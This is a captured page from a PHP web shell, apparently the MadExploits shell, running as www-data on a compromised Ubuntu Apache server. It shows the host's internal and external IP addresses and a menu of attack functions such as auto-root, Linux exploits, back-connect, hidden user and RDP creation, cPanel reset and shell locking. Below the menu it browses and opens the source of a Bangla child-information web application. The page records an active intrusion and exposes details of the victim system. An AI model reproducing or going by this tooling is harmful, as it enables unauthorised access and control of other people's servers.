Linux 0193-eed-moe-app01 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
Apache/2.4.52 (Ubuntu)
: 172.16.229.234 | : 18.217.244.16
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.18
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
eedpims /
childinfo /
[ HOME SHELL ]
Name
Size
Permission
Action
childinfo.php
3.34
KB
-rw-r--r--
childinfo_editor.php
4.12
KB
-rw-r--r--
childinfo_list.php
5.95
KB
-rw-r--r--
view.php
3.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : childinfo_editor.php
<?php include("../homepage/header.php"); include("../homepage/headermenu.php"); ?> <div class="container fullheight"> <div class="row"> <div class="col-md-8 col-md-offset-2"> <br/> <div><font class="headline">সন্তানের তথ্য যোগ করুন</font></div> <div style="background-color: #ff0000;height: 2px"> </div> <div align="right"><a href="childinfo.php?cmd=list">লিস্ট দেখুন</a></font></div> <div class="div-ln"> <br/> <form name="frm_childinfo" method="post" enctype="multipart/form-data" class="form-horizontal"> <div class="form-group"> <label class="col-md-4 control-label">সন্তানের নাম (বাংলায়)</label> <div class="col-md-6"> <input type="text" class="form-control" required name="NameB" value="<?=$NameB?>"> </div> </div> <div class="form-group"> <label class="col-md-4 control-label">সন্তানের নাম (ইংরেজিতে)</label> <div class="col-md-6"> <input type="text" class="form-control" name="NameE" value="<?=$NameE?>"> </div> </div> <div class="form-group"> <label class="col-md-4 control-label">জন্ম তারিখ</label> <div class="col-md-6"> <input type="text" class="form-control" name="birthDate" id="birthDate" value="<?=$birthDate?>"> </div> </div> <div class="form-group"> <label class="col-md-4 control-label">ছেলে/মেয়ে</label> <div class="col-md-6"> <input type="text" class="form-control" name="sex" value="<?=$sex?>"> </div> </div> <div class="form-group"> <label class="col-md-4 control-label">প্রতিবন্ধী কি না?</label> <div class="col-md-6"> <?php // prepare and bind $stmt = $conn->prepare("SELECT * FROM disability"); $stmt->execute(); //Result $result = $stmt->get_result(); ?> <select name="disability_id" id="disability_id" required class="form-control"> <option value="">--Select--</option> <?php while($row = $result->fetch_assoc()) { ?> <option value="<?=$row["id"]?>" <?php if($row["id"]==$disability_id){ echo "selected"; }?>><?=$row["disabilityName"]?> </option> <?php } $stmt->close(); ?> </select> </div> </div> <div class="form-group"> <div class="col-md-6 col-md-offset-4"> <input type="hidden" name="cmd" value="add"> <input type="hidden" name="id" value="<?=$Id?>"> <button type="submit" class="btn btn-primary"> <i class="fa fa-btn fa-sign-in"></i>Submit </button> </div> </div> </form> </div> </div> </div> </div> <?php include("../homepage/footer.php"); ?> <script type="text/javascript"> $('#birthDate').datepicker({ dateFormat:"dd/mm/yy", changeMonth: true, changeYear: true, yearRange: "1955:2040" }) </script>
Close